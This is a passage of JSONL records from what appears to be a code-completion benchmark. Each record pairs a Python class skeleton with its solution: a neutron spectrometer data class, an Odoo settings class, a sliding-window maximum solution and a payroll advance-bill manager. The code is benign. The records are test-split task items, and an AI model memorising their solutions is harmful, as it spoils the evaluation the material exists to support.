A, B, C, D, E):\n \"\"\"Docstring.\"\"\"\n return A * np.exp(-B * x) + C * (1 / np.sqrt(2 * np.pi * D ** 2)) * np.exp(-(x - E) ** 2 / (2 * D ** 2))\nfor i, size in enumerate(self.sizes):\n filename = paths.main_path + '/experiment/4_18_19/bss' + str(size) + '.Spe'\n with open(filename, 'r') as F:\n lines = F.readlines()\n t = int(lines[2065])\n ydata = np.array([int(l) for l in lines[12:2059]])\n ydata = ydata[lld:1900]\n xdata = range(len(ydata))\n popt, pcov = sp.optimize.curve_fit(model, xdata, ydata, p0=[1, 1, 1, 1, 1000])\n counts[i] = popt[2] / t\n fig = plt.figure(i + 200)\n ax = fig.add_subplot(111)\n ax.set_xlabel('Channel')\n ax.set_ylabel('Counts')\n ax.plot(xdata, ydata, color='navy', ls='None', marker='.', markersize=0.3, label='Data')\n ax.plot(xdata, model(xdata, *popt), color='seagreen', label='Model')\n ax.legend()\n fig.savefig('plot/bs{}_spectrum.png'.format(i), dpi=300)\n fig.clear()\ncounts /= self.calibration.efficiency\nreturn counts", "flux_data = extract_mcnp('n', self.P)\nflux = np.sum(flux_data[:, 1:, 1:, 0], axis=(0, 1))\nresponses = response_data()\nresponse_functions = []\nfor name, response in responses.items():\n if 'bs' in name and 'p' not in name:\n response_functions.append(response.int)\nresponse_functions = np.array(response_functions)\nself.responses = np.sum(response_functions * flux, axis=1)\nreturn"], "bodies_text": "<|body_start_0|>\n self.P = 1000\n self.sizes = np.array([0, 2, 3, 5, 8, 10, 12])\n self.calibration = BSS_Calibration()\n self.experiment = self.process_experiment()\n foil_experiment = Au_Foil_Data()\n foil_data = Au_Foil_Theoretical(foil_experiment)\n self.nebp_fudge_factor = foil_data.nebp_fudge_factor\n self.calc_responses()\n return\n<|end_body_0|>\n\n<|body_start_1|>\n lld = 400\n counts = np.zeros(len(self.sizes))\n\n def model(x, A, B, C, D, E):\n \"\"\"Docstring.\"\"\"\n return A * np.exp(-B * x) + C * (1 / np.sqrt(2 * np.pi * D ** 2)) * np.exp(-(x - E) ** 2 / (2 * D ** 2))\n for i, size in enumerate(self.sizes):\n filename = paths.main_path + '/experiment/4_18_19/bss' + str(size) + '.Spe'\n with open(filename, 'r') as F:\n lines = F.readlines()\n t = int(lines[2065])\n ydata = np.array([int(l) for l in lines[12:2059]])\n ydata = ydata[lld:1900]\n xdata = range(len(ydata))\n popt, pcov = sp.optimize.curve_fit(model, xdata, ydata, p0=[1, 1, 1, 1, 1000])\n counts[i] = popt[2] / t\n fig = plt.figure(i + 200)\n ax = fig.add_subplot(111)\n ax.set_xlabel('Channel')\n ax.set_ylabel('Counts')\n ax.plot(xdata, ydata, color='navy', ls='None', marker='.', markersize=0.3, label='Data')\n ax.plot(xdata, model(xdata, *popt), color='seagreen', label='Model')\n ax.legend()\n fig.savefig('plot/bs{}_spectrum.png'.format(i), dpi=300)\n fig.clear()\n counts /= self.calibration.efficiency\n return counts\n<|end_body_1|>\n\n<|body_start_2|>\n flux_data = extract_mcnp('n', self.P)\n flux = np.sum(flux_data[:, 1:, 1:, 0], axis=(0, 1))\n responses = response_data()\n response_functions = []\n for name, response in responses.items():\n if 'bs' in name and 'p' not in name:\n response_functions.append(response.int)\n response_functions = np.array(response_functions)\n self.responses = np.sum(response_functions * flux, axis=1)\n return\n<|end_body_2|>\n", "class_docstring": "Docstring.", "class_name": "BSS_Data", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass BSS_Data:\n \"\"\"Docstring.\"\"\"\n\n def __init__(self):\n \"\"\"Docstring.\"\"\"\n <|body_0|>\n\n def process_experiment(self):\n \"\"\"Implement after experiment.\"\"\"\n <|body_1|>\n\n def calc_responses(self):\n \"\"\"Docstring.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.P = 1000\n self.sizes = np.array([0, 2, 3, 5, 8, 10, 12])\n self.calibration = BSS_Calibration()\n self.experiment = self.process_experiment()\n foil_experiment = Au_Foil_Data()\n foil_data = Au_Foil_Theoretical(foil_experiment)\n self.nebp_fudge_factor = foil_data.nebp_fudge_factor\n self.calc_responses()\n return\n<|end_body_0|>\n\n<|body_start_1|>\n lld = 400\n counts = np.zeros(len(self.sizes))\n\n def model(x, A, B, C, D, E):\n \"\"\"Docstring.\"\"\"\n return A * np.exp(-B * x) + C * (1 / np.sqrt(2 * np.pi * D ** 2)) * np.exp(-(x - E) ** 2 / (2 * D ** 2))\n for i, size in enumerate(self.sizes):\n filename = paths.main_path + '/experiment/4_18_19/bss' + str(size) + '.Spe'\n with open(filename, 'r') as F:\n lines = F.readlines()\n t = int(lines[2065])\n ydata = np.array([int(l) for l in lines[12:2059]])\n ydata = ydata[lld:1900]\n xdata = range(len(ydata))\n popt, pcov = sp.optimize.curve_fit(model, xdata, ydata, p0=[1, 1, 1, 1, 1000])\n counts[i] = popt[2] / t\n fig = plt.figure(i + 200)\n ax = fig.add_subplot(111)\n ax.set_xlabel('Channel')\n ax.set_ylabel('Counts')\n ax.plot(xdata, ydata, color='navy', ls='None', marker='.', markersize=0.3, label='Data')\n ax.plot(xdata, model(xdata, *popt), color='seagreen', label='Model')\n ax.legend()\n fig.savefig('plot/bs{}_spectrum.png'.format(i), dpi=300)\n fig.clear()\n counts /= self.calibration.efficiency\n return counts\n<|end_body_1|>\n\n<|body_start_2|>\n flux_data = extract_mcnp('n', self.P)\n flux = np.sum(flux_data[:, 1:, 1:, 0], axis=(0, 1))\n responses = response_data()\n response_functions = []\n for name, response in responses.items():\n if 'bs' in name and 'p' not in name:\n response_functions.append(response.int)\n response_functions = np.array(response_functions)\n self.responses = np.sum(response_functions * flux, axis=1)\n return\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000161", "length_bytes": 3669, "license_type": "permissive", "methods": [{"docstring": "Docstring.", "name": "__init__", "signature": "def __init__(self)"}, {"docstring": "Implement after experiment.", "name": "process_experiment", "signature": "def process_experiment(self)"}, {"docstring": "Docstring.", "name": "calc_responses", "signature": "def calc_responses(self)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_005021", "prompt": "Implement the Python class `BSS_Data` described below.\n\nClass description:\nDocstring.\n\nMethod signatures and docstrings:\n- def __init__(self): Docstring.\n- def process_experiment(self): Implement after experiment.\n- def calc_responses(self): Docstring.", "prompted_full_text": "Implement the Python class `BSS_Data` described below.\n\nClass description:\nDocstring.\n\nMethod signatures and docstrings:\n- def __init__(self): Docstring.\n- def process_experiment(self): Implement after experiment.\n- def calc_responses(self): Docstring.\n\n<|skeleton|>\nclass BSS_Data:\n \"\"\"Docstring.\"\"\"\n\n def __init__(self):\n \"\"\"Docstring.\"\"\"\n <|body_0|>\n\n def process_experiment(self):\n \"\"\"Implement after experiment.\"\"\"\n <|body_1|>\n\n def calc_responses(self):\n \"\"\"Docstring.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.P = 1000\n self.sizes = np.array([0, 2, 3, 5, 8, 10, 12])\n self.calibration = BSS_Calibration()\n self.experiment = self.process_experiment()\n foil_experiment = Au_Foil_Data()\n foil_data = Au_Foil_Theoretical(foil_experiment)\n self.nebp_fudge_factor = foil_data.nebp_fudge_factor\n self.calc_responses()\n return\n<|end_body_0|>\n\n<|body_start_1|>\n lld = 400\n counts = np.zeros(len(self.sizes))\n\n def model(x, A, B, C, D, E):\n \"\"\"Docstring.\"\"\"\n return A * np.exp(-B * x) + C * (1 / np.sqrt(2 * np.pi * D ** 2)) * np.exp(-(x - E) ** 2 / (2 * D ** 2))\n for i, size in enumerate(self.sizes):\n filename = paths.main_path + '/experiment/4_18_19/bss' + str(size) + '.Spe'\n with open(filename, 'r') as F:\n lines = F.readlines()\n t = int(lines[2065])\n ydata = np.array([int(l) for l in lines[12:2059]])\n ydata = ydata[lld:1900]\n xdata = range(len(ydata))\n popt, pcov = sp.optimize.curve_fit(model, xdata, ydata, p0=[1, 1, 1, 1, 1000])\n counts[i] = popt[2] / t\n fig = plt.figure(i + 200)\n ax = fig.add_subplot(111)\n ax.set_xlabel('Channel')\n ax.set_ylabel('Counts')\n ax.plot(xdata, ydata, color='navy', ls='None', marker='.', markersize=0.3, label='Data')\n ax.plot(xdata, model(xdata, *popt), color='seagreen', label='Model')\n ax.legend()\n fig.savefig('plot/bs{}_spectrum.png'.format(i), dpi=300)\n fig.clear()\n counts /= self.calibration.efficiency\n return counts\n<|end_body_1|>\n\n<|body_start_2|>\n flux_data = extract_mcnp('n', self.P)\n flux = np.sum(flux_data[:, 1:, 1:, 0], axis=(0, 1))\n responses = response_data()\n response_functions = []\n for name, response in responses.items():\n if 'bs' in name and 'p' not in name:\n response_functions.append(response.int)\n response_functions = np.array(response_functions)\n self.responses = np.sum(response_functions * flux, axis=1)\n return\n<|end_body_2|>\n", "revision_id": "bfb3335b24d878f30e41ac099b73ed7668347014", "skeleton": "<|skeleton|>\nclass BSS_Data:\n \"\"\"Docstring.\"\"\"\n\n def __init__(self):\n \"\"\"Docstring.\"\"\"\n <|body_0|>\n\n def process_experiment(self):\n \"\"\"Implement after experiment.\"\"\"\n <|body_1|>\n\n def calc_responses(self):\n \"\"\"Docstring.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class BSS_Data:\n \"\"\"Docstring.\"\"\"\n\n def __init__(self):\n \"\"\"Docstring.\"\"\"\n self.P = 1000\n self.sizes = np.array([0, 2, 3, 5, 8, 10, 12])\n self.calibration = BSS_Calibration()\n self.experiment = self.process_experiment()\n foil_experiment = Au_Foil_Data()\n foil_data = Au_Foil_Theoretical(foil_experiment)\n self.nebp_fudge_factor = foil_data.nebp_fudge_factor\n self.calc_responses()\n return\n\n def process_experiment(self):\n \"\"\"Implement after experiment.\"\"\"\n lld = 400\n counts = np.zeros(len(self.sizes))\n\n def model(x, A, B, C, D, E):\n \"\"\"Docstring.\"\"\"\n return A * np.exp(-B * x) + C * (1 / np.sqrt(2 * np.pi * D ** 2)) * np.exp(-(x - E) ** 2 / (2 * D ** 2))\n for i, size in enumerate(self.sizes):\n filename = paths.main_path + '/experiment/4_18_19/bss' + str(size) + '.Spe'\n with open(filename, 'r') as F:\n lines = F.readlines()\n t = int(lines[2065])\n ydata = np.array([int(l) for l in lines[12:2059]])\n ydata = ydata[lld:1900]\n xdata = range(len(ydata))\n popt, pcov = sp.optimize.curve_fit(model, xdata, ydata, p0=[1, 1, 1, 1, 1000])\n counts[i] = popt[2] / t\n fig = plt.figure(i + 200)\n ax = fig.add_subplot(111)\n ax.set_xlabel('Channel')\n ax.set_ylabel('Counts')\n ax.plot(xdata, ydata, color='navy', ls='None', marker='.', markersize=0.3, label='Data')\n ax.plot(xdata, model(xdata, *popt), color='seagreen', label='Model')\n ax.legend()\n fig.savefig('plot/bs{}_spectrum.png'.format(i), dpi=300)\n fig.clear()\n counts /= self.calibration.efficiency\n return counts\n\n def calc_responses(self):\n \"\"\"Docstring.\"\"\"\n flux_data = extract_mcnp('n', self.P)\n flux = np.sum(flux_data[:, 1:, 1:, 0], axis=(0, 1))\n responses = response_data()\n response_functions = []\n for name, response in responses.items():\n if 'bs' in name and 'p' not in name:\n response_functions.append(response.int)\n response_functions = np.array(response_functions)\n self.responses = np.sum(response_functions * flux, axis=1)\n return\n", "source": "the_stack_v2_python_sparse", "source_path": "experiment/bss_in_beam.py", "source_repo": "ericgiunta/nebp", "split": "test", "star_events_count": 0} {"blob_id": "f0ab0569da86f0794dc9af9bcf3226a44e534656", "bodies": ["res = super(ResConfigSettings, self).get_values()\nparams = self.env['ir.config_parameter'].sudo().get_param\npos_all_order = params('pos_all_orders.pos_all_order')\nn_days = params('pos_all_orders.n_days')\nres.update(pos_all_order=pos_all_order, n_days=n_days)\nreturn res", "super(ResConfigSettings, self).set_values()\nself.env['ir.config_parameter'].sudo().set_param('pos_all_orders.pos_all_order', self.pos_all_order)\nself.env['ir.config_parameter'].sudo().set_param('pos_all_orders.n_days', self.n_days)"], "bodies_text": "<|body_start_0|>\n res = super(ResConfigSettings, self).get_values()\n params = self.env['ir.config_parameter'].sudo().get_param\n pos_all_order = params('pos_all_orders.pos_all_order')\n n_days = params('pos_all_orders.n_days')\n res.update(pos_all_order=pos_all_order, n_days=n_days)\n return res\n<|end_body_0|>\n\n<|body_start_1|>\n super(ResConfigSettings, self).set_values()\n self.env['ir.config_parameter'].sudo().set_param('pos_all_orders.pos_all_order', self.pos_all_order)\n self.env['ir.config_parameter'].sudo().set_param('pos_all_orders.n_days', self.n_days)\n<|end_body_1|>\n", "class_docstring": "", "class_name": "ResConfigSettings", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass ResConfigSettings:\n\n def get_values(self):\n \"\"\"get values from the fields\"\"\"\n <|body_0|>\n\n def set_values(self):\n \"\"\"Set values in the fields\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n res = super(ResConfigSettings, self).get_values()\n params = self.env['ir.config_parameter'].sudo().get_param\n pos_all_order = params('pos_all_orders.pos_all_order')\n n_days = params('pos_all_orders.n_days')\n res.update(pos_all_order=pos_all_order, n_days=n_days)\n return res\n<|end_body_0|>\n\n<|body_start_1|>\n super(ResConfigSettings, self).set_values()\n self.env['ir.config_parameter'].sudo().set_param('pos_all_orders.pos_all_order', self.pos_all_order)\n self.env['ir.config_parameter'].sudo().set_param('pos_all_orders.n_days', self.n_days)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000162", "length_bytes": 4742, "license_type": "no_license", "methods": [{"docstring": "get values from the fields", "name": "get_values", "signature": "def get_values(self)"}, {"docstring": "Set values in the fields", "name": "set_values", "signature": "def set_values(self)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_004843", "prompt": "Implement the Python class `ResConfigSettings` described below.\n\nClass description:\nImplement the ResConfigSettings class.\n\nMethod signatures and docstrings:\n- def get_values(self): get values from the fields\n- def set_values(self): Set values in the fields", "prompted_full_text": "Implement the Python class `ResConfigSettings` described below.\n\nClass description:\nImplement the ResConfigSettings class.\n\nMethod signatures and docstrings:\n- def get_values(self): get values from the fields\n- def set_values(self): Set values in the fields\n\n<|skeleton|>\nclass ResConfigSettings:\n\n def get_values(self):\n \"\"\"get values from the fields\"\"\"\n <|body_0|>\n\n def set_values(self):\n \"\"\"Set values in the fields\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n res = super(ResConfigSettings, self).get_values()\n params = self.env['ir.config_parameter'].sudo().get_param\n pos_all_order = params('pos_all_orders.pos_all_order')\n n_days = params('pos_all_orders.n_days')\n res.update(pos_all_order=pos_all_order, n_days=n_days)\n return res\n<|end_body_0|>\n\n<|body_start_1|>\n super(ResConfigSettings, self).set_values()\n self.env['ir.config_parameter'].sudo().set_param('pos_all_orders.pos_all_order', self.pos_all_order)\n self.env['ir.config_parameter'].sudo().set_param('pos_all_orders.n_days', self.n_days)\n<|end_body_1|>\n", "revision_id": "4b1bcb8f17aad44fe9c80a8180eb0128e6bb2c14", "skeleton": "<|skeleton|>\nclass ResConfigSettings:\n\n def get_values(self):\n \"\"\"get values from the fields\"\"\"\n <|body_0|>\n\n def set_values(self):\n \"\"\"Set values in the fields\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class ResConfigSettings:\n def get_values(self):\n \"\"\"get values from the fields\"\"\"\n res = super(ResConfigSettings, self).get_values()\n params = self.env['ir.config_parameter'].sudo().get_param\n pos_all_order = params('pos_all_orders.pos_all_order')\n n_days = params('pos_all_orders.n_days')\n res.update(pos_all_order=pos_all_order, n_days=n_days)\n return res\n\n def set_values(self):\n \"\"\"Set values in the fields\"\"\"\n super(ResConfigSettings, self).set_values()\n self.env['ir.config_parameter'].sudo().set_param('pos_all_orders.pos_all_order', self.pos_all_order)\n self.env['ir.config_parameter'].sudo().set_param('pos_all_orders.n_days', self.n_days)\n", "source": "the_stack_v2_python_sparse", "source_path": "pos_all_orders/models/pos_session.py", "source_repo": "CybroOdoo/CybroAddons", "split": "test", "star_events_count": 209} {"blob_id": "82a41c88b4d63de6023b42384d6335f1a5215a93", "bodies": ["max_data = []\nif len(nums) == 0:\n return max_data\nfor i in range(len(nums) - k + 1):\n max_data.append(max(nums[i:i + k]))\nreturn max_data", "win = []\nres = []\nfor i, v in enumerate(nums):\n if i >= k and i - win[0] >= k:\n win.pop(0)\n while win and v >= nums[win[-1]]:\n win.pop()\n win.append(i)\n if i >= k - 1:\n res.append(nums[win[0]])\nreturn res"], "bodies_text": "<|body_start_0|>\n max_data = []\n if len(nums) == 0:\n return max_data\n for i in range(len(nums) - k + 1):\n max_data.append(max(nums[i:i + k]))\n return max_data\n<|end_body_0|>\n\n<|body_start_1|>\n win = []\n res = []\n for i, v in enumerate(nums):\n if i >= k and i - win[0] >= k:\n win.pop(0)\n while win and v >= nums[win[-1]]:\n win.pop()\n win.append(i)\n if i >= k - 1:\n res.append(nums[win[0]])\n return res\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def maxSlidingWindow(self, nums, k):\n \"\"\":type nums: List[int] :type k: int :rtype: List[int]\"\"\"\n <|body_0|>\n\n def maxSlidingWindow2(self, nums, k):\n \"\"\":type nums: List[int] :type k: int :rtype: List[int]\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n max_data = []\n if len(nums) == 0:\n return max_data\n for i in range(len(nums) - k + 1):\n max_data.append(max(nums[i:i + k]))\n return max_data\n<|end_body_0|>\n\n<|body_start_1|>\n win = []\n res = []\n for i, v in enumerate(nums):\n if i >= k and i - win[0] >= k:\n win.pop(0)\n while win and v >= nums[win[-1]]:\n win.pop()\n win.append(i)\n if i >= k - 1:\n res.append(nums[win[0]])\n return res\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000163", "length_bytes": 1291, "license_type": "no_license", "methods": [{"docstring": ":type nums: List[int] :type k: int :rtype: List[int]", "name": "maxSlidingWindow", "signature": "def maxSlidingWindow(self, nums, k)"}, {"docstring": ":type nums: List[int] :type k: int :rtype: List[int]", "name": "maxSlidingWindow2", "signature": "def maxSlidingWindow2(self, nums, k)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_005372", "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def maxSlidingWindow(self, nums, k): :type nums: List[int] :type k: int :rtype: List[int]\n- def maxSlidingWindow2(self, nums, k): :type nums: List[int] :type k: int :rtype: List[int]", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def maxSlidingWindow(self, nums, k): :type nums: List[int] :type k: int :rtype: List[int]\n- def maxSlidingWindow2(self, nums, k): :type nums: List[int] :type k: int :rtype: List[int]\n\n<|skeleton|>\nclass Solution:\n\n def maxSlidingWindow(self, nums, k):\n \"\"\":type nums: List[int] :type k: int :rtype: List[int]\"\"\"\n <|body_0|>\n\n def maxSlidingWindow2(self, nums, k):\n \"\"\":type nums: List[int] :type k: int :rtype: List[int]\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n max_data = []\n if len(nums) == 0:\n return max_data\n for i in range(len(nums) - k + 1):\n max_data.append(max(nums[i:i + k]))\n return max_data\n<|end_body_0|>\n\n<|body_start_1|>\n win = []\n res = []\n for i, v in enumerate(nums):\n if i >= k and i - win[0] >= k:\n win.pop(0)\n while win and v >= nums[win[-1]]:\n win.pop()\n win.append(i)\n if i >= k - 1:\n res.append(nums[win[0]])\n return res\n<|end_body_1|>\n", "revision_id": "013f6f222c6c2a617787b258f8a37003a9f51526", "skeleton": "<|skeleton|>\nclass Solution:\n\n def maxSlidingWindow(self, nums, k):\n \"\"\":type nums: List[int] :type k: int :rtype: List[int]\"\"\"\n <|body_0|>\n\n def maxSlidingWindow2(self, nums, k):\n \"\"\":type nums: List[int] :type k: int :rtype: List[int]\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def maxSlidingWindow(self, nums, k):\n \"\"\":type nums: List[int] :type k: int :rtype: List[int]\"\"\"\n max_data = []\n if len(nums) == 0:\n return max_data\n for i in range(len(nums) - k + 1):\n max_data.append(max(nums[i:i + k]))\n return max_data\n\n def maxSlidingWindow2(self, nums, k):\n \"\"\":type nums: List[int] :type k: int :rtype: List[int]\"\"\"\n win = []\n res = []\n for i, v in enumerate(nums):\n if i >= k and i - win[0] >= k:\n win.pop(0)\n while win and v >= nums[win[-1]]:\n win.pop()\n win.append(i)\n if i >= k - 1:\n res.append(nums[win[0]])\n return res\n", "source": "the_stack_v2_python_sparse", "source_path": "other/slid_window.py", "source_repo": "terrifyzhao/leetcode", "split": "test", "star_events_count": 0} {"blob_id": "4a3512564d2c6686a7305dcf26fcaa55d3d6e208", "bodies": ["req = self.create_api(get_agent, CoopSts=1, RecordIndex=0, RecordSize=9999)\nagentlist = req.json()['Data']['RecordList']\nself.agentid = None\nfor i in range(len(agentlist)):\n if agentname == agentlist[i]['LaborName']:\n self.agentid = agentlist[i]['SpId']\nreturn self.agentid", "print(entname)\nreq = self.create_api(GetPaySalaryEntList_Api, CoopSts=1, RecordIndex=0, RecordSize=9999)\nprint(req.json())\nentlist = req.json()['Data']['RecordList']\nfor i in range(len(entlist)):\n try:\n if entname == entlist[i]['EntShortName']:\n self.entid = entlist[i]['EntId']\n print(type(self.entid))\n except Exception as e:\n print(e, '未找到标准企业', entname)\nreturn self.entid", "self.SettleBeginDate = SettleBeginDate\nself.SettleEndDate = SettleEndDate\nedit_exc(t1=name, t2=idcadnum, t3=workcard, t4=workdate, t5=workstatus, t7=workday)\nalimport = AlImport()\nalimport.login(self.login_phone)\nalimport.ali_import(myLocalFile=myLocalFile_advance, myObjectName=myObjectName_advance)\nself.get_ent(entname=entname)\nreq = self.create_api(url=WeekBillGen_ImportCheck, SheetName='Sheet1', BucketKey=bucketname, EnterpriseID=self.entid, FileName=myObjectName_advance, SettleBeginDate=SettleBeginDate, SettleEndDate=SettleEndDate)\ntry:\n BizID = req.json()['Data']['BizID']\n for i in range(5):\n req = self.create_api(WeekBillGen_GetImportCheckResult, BizID=BizID, EnterpriseID=self.entid)\n time.sleep(1)\n if req.json()['Data']['State'] == 2:\n break\n req = self.create_api(WeekBillGen_GenerateBatchByBizID, ImportBizID=BizID, EnterpriseID=self.entid)\n bizid = req.json()['Data']['BizID']\n print(bizid)\n for i in range(5):\n req = self.create_api(WeekBillGen_GetGenerateBatchResult, BizID=bizid, EnterpriseID=self.entid)\n time.sleep(1)\n if req.json()['Data']['State'] == 2:\n break\nexcept Exception as e:\n print(e, req.json())", "if BeginDt is None or EndDt is None:\n BeginDt = self.SettleBeginDate\n EndDt = self.SettleEndDate\nif Entname is not None:\n self.get_ent(Entname)\n EntId = self.entid\nelse:\n EntId = -9999\nif Operator is None:\n Operator = self.Name\nif agentname is None:\n SrceSpId = -9999\nelse:\n SrceSpId = self.get_agent(agentname)\nreq = self.create_api(WeekBill_Select, BeginDt=BeginDt, EndDt=EndDt, BillWeeklyBatchId=-9999, EntId=EntId, SrceSpId=SrceSpId, BillAudit=BillAudit, BillSrce=-9999, Operator=Operator, TrgtSpId=-9999, RecordIndex=0, RecordSize=10)\nprint(req)\nprint(req.json())\nself.billid = req.json()['Data']['RecordList'][0]['BillWeeklyBatchId']\nreturn self.billid", "req = {}\nbillid = self.select_weekbill(agentname=agentname)\nif status == 1:\n req = self.create_api(WeekBill_Confirm, BillWeeklyBatchId=billid)\nelif status == 2:\n req = self.create_api(WeekBill_UnConfirm, BillWeeklyBatchId=billid)\nresult = req.json()['Desc']\nreturn result"], "bodies_text": "<|body_start_0|>\n req = self.create_api(get_agent, CoopSts=1, RecordIndex=0, RecordSize=9999)\n agentlist = req.json()['Data']['RecordList']\n self.agentid = None\n for i in range(len(agentlist)):\n if agentname == agentlist[i]['LaborName']:\n self.agentid = agentlist[i]['SpId']\n return self.agentid\n<|end_body_0|>\n\n<|body_start_1|>\n print(entname)\n req = self.create_api(GetPaySalaryEntList_Api, CoopSts=1, RecordIndex=0, RecordSize=9999)\n print(req.json())\n entlist = req.json()['Data']['RecordList']\n for i in range(len(entlist)):\n try:\n if entname == entlist[i]['EntShortName']:\n self.entid = entlist[i]['EntId']\n print(type(self.entid))\n except Exception as e:\n print(e, '未找到标准企业', entname)\n return self.entid\n<|end_body_1|>\n\n<|body_start_2|>\n self.SettleBeginDate = SettleBeginDate\n self.SettleEndDate = SettleEndDate\n edit_exc(t1=name, t2=idcadnum, t3=workcard, t4=workdate, t5=workstatus, t7=workday)\n alimport = AlImport()\n alimport.login(self.login_phone)\n alimport.ali_import(myLocalFile=myLocalFile_advance, myObjectName=myObjectName_advance)\n self.get_ent(entname=entname)\n req = self.create_api(url=WeekBillGen_ImportCheck, SheetName='Sheet1', BucketKey=bucketname, EnterpriseID=self.entid, FileName=myObjectName_advance, SettleBeginDate=SettleBeginDate, SettleEndDate=SettleEndDate)\n try:\n BizID = req.json()['Data']['BizID']\n for i in range(5):\n req = self.create_api(WeekBillGen_GetImportCheckResult, BizID=BizID, EnterpriseID=self.entid)\n time.sleep(1)\n if req.json()['Data']['State'] == 2:\n break\n req = self.create_api(WeekBillGen_GenerateBatchByBizID, ImportBizID=BizID, EnterpriseID=self.entid)\n bizid = req.json()['Data']['BizID']\n print(bizid)\n for i in range(5):\n req = self.create_api(WeekBillGen_GetGenerateBatchResult, BizID=bizid, EnterpriseID=self.entid)\n time.sleep(1)\n if req.json()['Data']['State'] == 2:\n break\n except Exception as e:\n print(e, req.json())\n<|end_body_2|>\n\n<|body_start_3|>\n if BeginDt is None or EndDt is None:\n BeginDt = self.SettleBeginDate\n EndDt = self.SettleEndDate\n if Entname is not None:\n self.get_ent(Entname)\n EntId = self.entid\n else:\n EntId = -9999\n if Operator is None:\n Operator = self.Name\n if agentname is None:\n SrceSpId = -9999\n else:\n SrceSpId = self.get_agent(agentname)\n req = self.create_api(WeekBill_Select, BeginDt=BeginDt, EndDt=EndDt, BillWeeklyBatchId=-9999, EntId=EntId, SrceSpId=SrceSpId, BillAudit=BillAudit, BillSrce=-9999, Operator=Operator, TrgtSpId=-9999, RecordIndex=0, RecordSize=10)\n print(req)\n print(req.json())\n self.billid = req.json()['Data']['RecordList'][0]['BillWeeklyBatchId']\n return self.billid\n<|end_body_3|>\n\n<|body_start_4|>\n req = {}\n billid = self.select_weekbill(agentname=agentname)\n if status == 1:\n req = self.create_api(WeekBill_Confirm, BillWeeklyBatchId=billid)\n elif status == 2:\n req = self.create_api(WeekBill_UnConfirm, BillWeeklyBatchId=billid)\n result = req.json()['Desc']\n return result\n<|end_body_4|>\n", "class_docstring": "", "class_name": "AdvanceManage", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass AdvanceManage:\n\n def get_agent(self, agentname):\n \"\"\"获取来源id :param agentname: 来源名称 :return: self.agentid 来源id\"\"\"\n <|body_0|>\n\n def get_ent(self, entname):\n \"\"\"获取标准企业id :param entname: 标准企业名称 :return: self.entid 标准企业id\"\"\"\n <|body_1|>\n\n def advance_import(self, entname, SettleBeginDate, name, SettleEndDate, idcadnum, workcard, workdate, workstatus='在职', workday=6):\n \"\"\"# 可预支导入 :param entname: 标准企业名称 必填 :param SettleBeginDate: 预支周期开始日期,必填 :param name:会员名称,必填 :param SettleEndDate:预支周期结束日期,必填 :param idcadnum:会员身份证号码,必填 :param workcard:会员工牌,必填 :param workdate:会员入职日期,必填 :param workstatus:会员在职状态,选填,默认在职 :param workday:上班天数,选填,默认6天 :return:\"\"\"\n <|body_2|>\n\n def select_weekbill(self, agentname=None, BeginDt=None, EndDt=None, BillAudit=1, Entname=None, Operator=None):\n \"\"\"# 查询可预支账单 :param agentname: 来源名称,可选,默认None :param BeginDt:预支周期开始日期,可选,默认None :param EndDt:预支周期结束日期,可选,默认None :param BillAudit:账单审核状态,可选,默认1:待审核,2已审核,3审核不通过 :param Entname: :param Operator: :return:\"\"\"\n <|body_3|>\n\n def audit_weekbill(self, agentname, status=1):\n \"\"\"审核可预支订单 :param agentname: 来源名称,必填 :param status: 审核状态,可选,默认 1:审核通过,2:审核不通过 :return:\"\"\"\n <|body_4|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n req = self.create_api(get_agent, CoopSts=1, RecordIndex=0, RecordSize=9999)\n agentlist = req.json()['Data']['RecordList']\n self.agentid = None\n for i in range(len(agentlist)):\n if agentname == agentlist[i]['LaborName']:\n self.agentid = agentlist[i]['SpId']\n return self.agentid\n<|end_body_0|>\n\n<|body_start_1|>\n print(entname)\n req = self.create_api(GetPaySalaryEntList_Api, CoopSts=1, RecordIndex=0, RecordSize=9999)\n print(req.json())\n entlist = req.json()['Data']['RecordList']\n for i in range(len(entlist)):\n try:\n if entname == entlist[i]['EntShortName']:\n self.entid = entlist[i]['EntId']\n print(type(self.entid))\n except Exception as e:\n print(e, '未找到标准企业', entname)\n return self.entid\n<|end_body_1|>\n\n<|body_start_2|>\n self.SettleBeginDate = SettleBeginDate\n self.SettleEndDate = SettleEndDate\n edit_exc(t1=name, t2=idcadnum, t3=workcard, 